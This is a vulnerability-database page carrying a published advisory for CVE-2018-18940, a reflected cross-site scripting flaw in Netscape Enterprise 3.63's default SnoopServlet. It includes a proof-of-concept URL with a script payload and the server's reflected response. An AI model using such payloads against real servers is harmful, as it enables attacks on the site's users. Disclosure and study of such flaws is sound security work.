| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
| Netscape Enterprise 3.63 Cross Site Scripting Vulnerability | 12 Nov 201800:00 | – | zdt | |
| Netscape Enterprise SnoopServlet servlet cross-site scripting vulnerability | 12 Nov 201800:00 | – | cnvd | |
| CVE-2018-18940 | 31 Jan 201919:00 | – | cve | |
| CVE-2018-18940 | 31 Jan 201919:00 | – | cvelist | |
| EUVD-2018-10646 | 7 Oct 202500:30 | – | euvd | |
| CVE-2018-18940 | 31 Jan 201919:29 | – | nvd | |
| Design/Logic Flaw | 31 Jan 201919:29 | – | prion |
`<!--
# Exploit Title: Cross Site Scripting in default SnoopServlet servlet
Netscape Enterprise 3.63
# Date: 05-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://en.wikipedia.org/wiki/Netscape
# Software Link: https://en.wikipedia.org/wiki/Netscape
# Version: Netscape Enterprise 3.63
# Tested on: all
# CVE : CVE-2018-18940
# Category: webapps
1. Description
The servlet/SnoopServlet (a servlet installed by default) in Netscape
Enterprise 3.63 has reflected XSS via an arbitrary parameter=[XSS] in the
query string. A remote unauthenticated attacker could potentially exploit
this vulnerability to supply malicious HTML or JavaScript code to a
vulnerable web application, which is then reflected back to the victim and
executed by the web browser.
2. Proof of Concept
http://X.X.X.X/servlet/SnoopServlet?XSS=<script>alert("XSS")</script>
The server response:
> Request URL:
>
> http://X.X.X.X/servlet/SnoopServlet
>
> Request information:
>
> Request method: GET
> Request URI: /servlet/SnoopServlet
> Request protocol: HTTP/1.1
> Servlet path: /servlet/SnoopServlet
> Path info: <none>
> Path translated: /PATHINSTALLED/netsrv2/AccessService/enterprise3.63/doc/
> Query string: PARAM=[XSS]
3. Solution:
The product is discontinued. Update to last version this product. See more
in https://en.wikipedia.org/wiki/Netscape
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation